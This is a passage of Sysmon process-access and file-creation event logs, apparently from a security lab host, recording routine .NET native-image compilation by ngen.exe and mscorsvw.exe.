08:07:15.725","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22B3-5F25-0000-001025B21000}","TargetProcessId":"4432","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8215,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:15.725\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22B3-5F25-0000-001025B21000}\r\nTargetProcessId: 4432\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:15.725","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22B3-5F25-0000-001025B21000}","TargetProcessId":"4432","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8216,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:15.740\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22B3-5F25-0000-001025B21000}\r\nTargetProcessId: 4432\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:15.740","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22B3-5F25-0000-001025B21000}","TargetProcessId":"4432","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8217,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:15.772\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22B3-5F25-0000-0010F6B51000}\r\nTargetProcessId: 2896\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:15.772","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22B3-5F25-0000-0010F6B51000}","TargetProcessId":"2896","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8218,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:15.772\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22B3-5F25-0000-0010F6B51000}\r\nTargetProcessId: 2896\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:15.772","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22B3-5F25-0000-0010F6B51000}","TargetProcessId":"2896","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8219,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:15.787\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22B3-5F25-0000-0010F6B51000}\r\nTargetProcessId: 2896\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:15.787","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22B3-5F25-0000-0010F6B51000}","TargetProcessId":"2896","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8220,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:15.850\r\nProcessGuid: {41C8662E-22B3-5F25-0000-0010F6B51000}\r\nProcessId: 2896\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b50-0\\System.Windows.Presentation.dll\r\nCreationUtcTime: 2020-08-01 08:07:15.850","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:15.850","ProcessGuid":"{41C8662E-22B3-5F25-0000-0010F6B51000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b50-0\\System.Windows.Presentation.dll","CreationUtcTime":"2020-08-01 08:07:15.850","EventReceivedTime":"2020-08-01 08:07:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8221,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:15.881\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22B3-5F25-0000-001032BB1000}\r\nTargetProcessId: 3936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:15.881","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22B3-5F25-0000-001032BB1000}","TargetProcessId":"3936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8222,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:15.897\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22B3-5F25-0000-001032BB1000}\r\nTargetProcessId: 3936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:15.897","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22B3-5F25-0000-001032BB1000}","TargetProcessId":"3936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8223,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:15.897\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22B3-5F25-0000-001032BB1000}\r\nTargetProcessId: 3936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: 